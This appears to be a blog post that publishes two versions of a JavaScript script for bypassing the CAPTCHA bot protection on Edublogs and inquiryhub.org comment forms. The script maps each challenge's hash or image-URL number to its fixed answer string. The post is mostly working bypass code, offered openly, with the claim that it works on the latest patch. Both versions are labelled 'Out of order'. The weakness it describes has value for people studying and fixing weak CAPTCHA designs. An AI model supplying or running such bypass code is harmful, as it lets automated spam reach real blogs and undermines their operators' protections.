Bot protection loophole 2.0

Out of order

Bot protection loophole 2.0;
– No longer requires jQuery
– Works on latest edublogs patch

document.getElementById("securitycode").value = (function() {
    switch(document.getElementsByName("matchthis")[0].value) {
        
        case "dcdbb4aadfd99d51b2700bfef40dae91": return "7spamisntnice";
        case "37feb765df324135e4549486c706b85e": return "22removingspam";
        case "9c04292e6e6ee70200ced9effe49cc74": return "9spamisbad";
        case "40a8b5472385e7c90b82575e40ddf2fd": return "220stopmrspam";
        case "2c9a83ddc3da5789bc2a589cad3bfbfc": return "2nospamhere";
        case "e180b07aa6961a957d5bb877f723e8bf": return "5nospamplease";
        case "ae49caecb8b127cd7b9fc959bcde6d62": return "4iamnotabot";
        case "ef9b0274bb27b35c958894e7b8e36c24": return "3iamahuman";
        case "552f18723ccec4fe9d58c683e8809228": return "8dontspamme";
        case "95665d47eece1d2228af7f8a2d859f56": return "6pleasedontspam";

        default: alert("Invalid captcha; refresh page and try again.");
    }
})();

Bot protection loophole

Out of order

Posting comments without accounts is supposed to be done manually, using images that only humans are supposed to be able to read.

But the ones employed on this site are extremely weak.

Using simple Javascript, we can easily get past the “bot protection” that can currently be found on any inquiryhub.org blog.

The bot protection only has 9 variations for bots to get past- and it says which variation it uses directly in the image.
This makes it extremely easy to bypass it.

$('securitycode').value = (function () {
    switch ($('securitycode').next().next().src.match(/antiselect=([0-9])/)[1]) {
        case '1': return '1removingspam';
        case '2': return '3iamahuman';
        case '3': return '4iamnotabot';
        case '4': return '5nospamplease';
        case '5': return '6pleasedontspam';
        case '6': return '7spamisntnice';
        case '7': return '8dontspamme';
        case '8': return '9spamisbad';
        case '9': return '10stopmrspam';
    }
})();

Awesome.

Is it, though?